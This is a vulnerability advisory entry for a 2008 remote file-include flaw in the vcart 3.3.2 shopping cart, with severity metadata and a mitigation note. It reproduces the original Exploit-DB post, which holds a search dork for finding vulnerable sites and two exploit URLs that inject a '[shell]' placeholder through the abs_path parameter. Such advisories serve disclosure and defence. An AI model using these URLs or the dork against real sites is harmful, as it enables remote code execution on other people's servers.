vcart version 3.3.2

vendor:

vcart

by:

k1n9k0ng

8.5

CVSS

HIGH

Remote File Include

CWE

Product Name: vcart

Affected Version From: 3.3.2002

Affected Version To: 3.3.2002

Patch Exists: NO

Related CWE: N/A

CPE: a:visionburst:vcart

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

vcart version 3.3.2 is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to execute arbitrary PHP code within the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct paths that are passed to include functions.

Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : vcart version 3.3.2
Discovered By   : k1n9k0ng
Scripts site    : http://www.visionburst.com/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee, letjen, k1tk4t
site            : www.sekuritionline.net
dork        : Powered by "vcart 3.3.2"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug found:
"http://www.site.net/index.php?abs_path=[shell]"
"http://www.site.net/checkout.php?abs_path=[shell]"

# milw0rm.com [2008-01-11]